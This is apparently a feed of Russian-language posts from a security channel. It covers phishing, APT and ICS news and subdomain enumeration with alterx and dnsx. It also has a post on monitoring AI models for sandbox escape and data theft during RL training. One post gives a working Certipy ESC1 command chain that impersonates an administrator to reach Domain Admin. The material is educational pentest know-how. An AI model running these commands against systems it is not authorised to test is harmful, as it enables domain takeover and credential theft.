Б
Белый хакер
31.08.2026 08:58 · 👁 1.2K
❌ Миф: если хакер не получил админку, атака провалилась
Привет! В отчётах часто смотрят на финальный результат: получил ли атакующий root, SYSTEM или доменные админские права. Но реальная атака может быть успешной и без этого.
👨💻 Допустим, атакующий получил обычную учётку сотрудника. Через неё он может читать внутренние документы, искать конфиги, вытаскивать токены из сервисов, изучать инфраструктуру и двигаться дальше. Иногда этого уже хватает для кражи данных.
🔐 Особенно интересен сценарий с сервисными аккаунтами. У них может не быть админских прав, зато есть доступ к API, Git-репозиториям, CI/CD или облачному хранилищу. С точки зрения ОС это «обычный пользователь», а с точки зрения инфраструктуры - ключ к гораздо более интересным системам.
🔍 Поэтому привилегии нельзя оценивать отдельно от того, к чему они дают доступ. Учётка с правами на чтение конфигурации Kubernetes может быть опаснее локального администратора на отдельном сервере, если в конфигурации лежат токены и секреты.
P.S. В хорошей атаке важен не ярлык admin, а цепочка доступов. Иногда самый незаметный аккаунт оказывается самым полезным.
#хакер #миф
👍 Белый хакер
Б
Белый хакер
30.08.2026 07:00 · 👁 1.6K
👍 Белый хакер #мем
Б
Белый хакер
28.08.2026 13:54 · 👁 1.8K
⌨️ Команда недели
Привет! Subfinder работает по пассивным источникам, что уже проиндексировано. Но dev.target.com, staging-api.target.com или internal.prod.target.com там не будет. Alterx генерирует перестановки, dnsx проверяет что из этого реально существует.
echo "target.com" | alterx | dnsx -r resolvers.txt -o alive-subdomains.txt
За минуту получаешь список субдоменов которые нигде не засвечены но реально отвечают.
👨💻 Что здесь происходит.
alterx - берёт домен и генерирует тысячи перестановок по встроенным паттернам: dev, staging, api, internal, test, prod и их комбинации
dnsx - массовый резолвер, проверяет какие из перестановок реально существуют в DNS
-r resolvers.txt - список публичных резолверов чтобы не упираться в лимиты одного.
Для более глубокого перебора можно добавить свой wordlist:
echo "target.com" | alterx -enrich | dnsx -r resolvers.txt -resp -o results.txt
-enrich добавляет слова из самого домена к стандартным паттернам.
P.S Самые интересные находки обычно staging и dev окружения - там часто слабее защита, debug-режим включён и торчат эндпоинты которых нет на проде. Находишь через alterx, проверяешь через httpx.
Какие паттерны субдоменов находите чаще всего? 👇
#alterx #dnsx
#КомандаНедели #Пентест
👍 Белый хакер
Б
Белый хакер
27.08.2026 14:59 · 👁 1.9K
NovaCookies крадёт сессии Microsoft 365 через настоящие письма DocuSign
Привет! Исследователи обнаружили новый фишинговый сервис NovaCookies, который продаётся по подписке за $320 в месяц. С его помощью злоумышленники крадут не только пароли, но и уже авторизованные сессии Microsoft 365.
👨💻 Схема начинается с настоящего уведомления DocuSign. Жертве приходит письмо о расшаренном документе, а вредоносная ссылка спрятана внутри самого PDF. Поскольку письмо действительно отправлено DocuSign, стандартные проверки почты могут не найти ничего подозрительного.
🗣После перехода пользователя проводят через несколько редиректов, а затем отправляют на поддельную страницу Microsoft 365. NovaCookies работает как прокси между браузером и Microsoft: в реальном времени передаёт введённый пароль и код MFA, а затем забирает готовую сессию.
🌐Поэтому обычная двухфакторная аутентификация здесь не всегда спасает. Украденная сессия уже подтверждена MFA и может использоваться для доступа к аккаунту без повторного ввода кода.
P.S. Сейчас фишинг всё чаще строится не вокруг поддельного письма, а вокруг настоящих сервисов. DocuSign, Microsoft, Google или Notion могут быть вполне настоящими - проблема находится внутри документа, редиректа или страницы, куда в итоге попадает пользователь.
#phishing #Microsoft365 #MFA #CyberSecurity
👍 Белый хакер
Б
Белый хакер
26.08.2026 13:36 · 👁 2.2K
США ввели санкции против иранских хакеров, взламывавших критическую инфраструктуру
Привет! США взялись сразу за несколько иранских хакеров, которых связывают с атаками на американские энергетические компании, оборонку, больницы, IT и финансовый сектор. Под санкции попали участники Mabna Institute, работавшие, по версии властей, в интересах иранской разведки.
👨💻 История там интересная. Хакеры не только выполняли задачи для государства, но и подрабатывали на стороне. Взламывали сети, вытаскивали данные, а некоторые атаки проводили уже ради личной прибыли. Один из участников, например, отдельно занимался кражей криптовалюты.
👀 Через связанные с группой криптокошельки, по данным TRM Labs, прошло около $16,8 млн. То есть речь идёт не о небольшой группе энтузиастов, а о людях, которые годами совмещали кибершпионаж с вполне обычной киберпреступностью.
📌 Всё это стало частью Operation Economic Outcast. США ввели санкции почти против 60 связанных с Ираном компаний, людей и судов. Отдельно Госдепартамент пообещал до $10 млн за информацию о тех, кто по указанию иностранных государств атакует критическую инфраструктуру США.
P.S. Самое показательное здесь то, как давно стёрлась граница между государственными хакерами и обычными киберпреступниками. Сегодня группа работает на разведку, завтра крадёт данные ради денег, а потом может вернуться к атаке на инфраструктуру.
#Iran #APT #CyberSecurity #Infosec
👍 Белый хакер
Б
Белый хакер
25.08.2026 11:46 · 👁 2.2K
QUICSILVER: хакеры атакуют госструктуры Мьянмы через фальшивые приглашения на выпускной
Привет! Исследователи обнаружили новую шпионскую кампанию Operation QUICSILVER, направленную на государственные и IT-организации Мьянмы. Для заражения используют поддельные документы и бэкдор QUICAgent, написанный на Go.
👨💻 Цепочка начинается с VHD-файла, внутри которого находится LNK, замаскированный под PDF. Пользователь открывает «документ» и видит настоящее на вид приглашение на выпускную церемонию, пока в фоне запускается штатный ftp.exe с параметром -s.
👀 Скрипт через ftp.exe собирает следующий этап из двух файлов, спрятанных в каталоге _rels. Получившийся бэкдор проверяет среду на признаки sandbox, делает случайную паузу и выполняет множество операций SHA-256, чтобы переждать автоматический анализ.
⚙️ Для связи с управляющим сервером QUICAgent использует протокол QUIC через UDP-порт 443. Адрес C2 получает через Cloudflare Workers, а после заражения может выполнять команды, работать с файлами и каталогами. Закрепление - через LNK в папке Windows Startup.
P.S. В этой кампании интересен не сам бэкдор, а вся цепочка: VHD, поддельный документ, легитимный ftp.exe, сборка полезной нагрузки из отдельных файлов и QUIC для связи с C2. Каждый этап по отдельности выглядит вполне обычным.
#APT #Malware #QUIC #CyberSecurity
👍 Белый хакер
Б
Белый хакер
24.08.2026 14:11 · 👁 2.4K
Хакеры используют ИИ для атак на промышленные контроллеры Siemens
Привет! Сразу пять ведомств США - АНБ, ФБР, CISA, Министерство энергетики и EPA - предупредили об угрозе для критической инфраструктуры. Хакеры атакуют доступные из интернета промышленные контроллеры Siemens S7 и используют ИИ для подготовки кода.
👨💻 Сначала через Censys, ZoomEye и другие поисковые системы находят открытые устройства. Затем с помощью ИИ быстро собирают Python-скрипты на базе библиотек вроде python-snap7, которые работают с контроллерами по протоколу S7comm.
👀 Главная проблема здесь - скорость. Раньше для работы с промышленными контроллерами нужно было разбираться в их протоколах, библиотеках и особенностях конкретного оборудования. Теперь часть этой работы можно автоматизировать и получить готовый код значительно быстрее.
🔥Под угрозой оказываются системы, управляющие реальными процессами: производством, водоочисткой и другой критической инфраструктурой. Поэтому базовая защита остаётся прежней - контроллеры не должны быть доступны напрямую из интернета, а промышленные сети необходимо отделять от обычной корпоративной инфраструктуры.
P.S. ИИ не создаёт новые уязвимости сам по себе, но заметно ускоряет работу тех, кто уже знает, что искать и куда атаковать.
#AI #Siemens #ICS #CISA #CyberSecurity
👍 Белый хакер
Б
Белый хакер
21.08.2026 10:53 · 👁 2.9K
⌨️ Команда недели
Привет! AD Certificate Services стоит во многих корпоративных сетях и почти никогда не настроен правильно. Certipy находит уязвимые шаблоны сертификатов через которые можно получить доступ к любому аккаунту в домене включая Domain Admin.
certipy find -u username@domain.local -p password -dc-ip 10.10.10.1 -vulnerable -stdout
Сканирует все шаблоны сертификатов и сразу показывает уязвимые с описанием техники эксплуатации.
👨💻 Что здесь происходит.
find - режим разведки, опрашивает Certificate Authority и собирает все шаблоны -vulnerable - фильтрует только то что можно эксплуатировать -stdout - вывод в терминал без сохранения в файл
Если нашёл ESC1 (самая частая мисконфигурация) - запрашиваешь сертификат от имени любого юзера:
certipy req -u username@domain.local -p password -dc-ip 10.10.10.1 -target ca.domain.local -ca 'CA-Name' -template VulnerableTemplate -upn administrator@domain.local
Потом аутентифицируешься с этим сертификатом и получаешь хэш администратора:
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
P.S ESC1 позволяет любому пользователю домена запросить сертификат с произвольным UPN. На практике это прямой путь к Domain Admin без касания lsass и без шума в логах аутентификации.
Часто встречаете AD CS в пентестах? 👇
#certipy #КомандаНедели #Пентест
👍 Белый хакер
Б
Белый хакер
21.08.2026 06:31 · 👁 2.2K
Хочешь этой осенью сделать первый шаг к работе в Росатоме? Начни с кейслаба по информационной безопасности!
🔐Кейслаб по информационной безопасности — это бесплатная программа с обучением, наставниками и практическими задачами Росатома. За месяц ты сможешь прокачать профессиональные навыки, познакомиться с реальными рабочими процессами и побороться за место в финале молодежного фестиваля «ИТ КоР 5.0. Новый код атомной отрасли».
🎯Лучшие участники кейслаба отправятся на очный финал в Нижний Новгород, а победители получат возможность пройти стажировку или начать работать на предприятиях Росатома.
Регистрация на кейслаб уже открыта: https://itcore.depreg.ru
Старт обучения — 24 августа.
Подробнее о фестивале: https://it-core2026.ru
🔥Если ИБ — направление, в котором ты хочешь развиваться, сейчас самое время проверить свои силы на реальных задачах.
Реклама.
О рекламодателе.
Б
Белый хакер
20.08.2026 12:51 · 👁 2.4K
OpenAI на две недели приостановила reinforcement learning для новых моделей
Привет! Компания временно остановила часть обучения после инцидента с Hugging Face и решила сначала ужесточить правила для тестовых сред. Крупнейший запланированный RL-запуск пока тоже остаётся на паузе. (OpenAI)
👨💻 Теперь модели будут работать в более жёстко изолированных sandbox. OpenAI ограничивает доступ к интернету, сокращает постоянные привилегии и добавляет непрерывные проверки безопасности.
👀 За действиями моделей будут следить отдельные автоматические системы. Они должны искать попытки получить неразрешённый доступ, украсть данные или обойти установленные ограничения. При подозрительной активности OpenAI планирует получать сигнал в течение 30 минут.
⚙️ Пока крупные обучения стоят, компания проводит небольшие тренировки и проверки. Только после них OpenAI собирается решить, можно ли возвращаться к прежнему масштабу.
P.S. История с Hugging Face показала неприятную вещь: дать модели инструменты и изолировать её в sandbox - разные задачи. Теперь OpenAI явно пытается закрыть именно эту дыру.
#attack #openai
👍 Белый хакер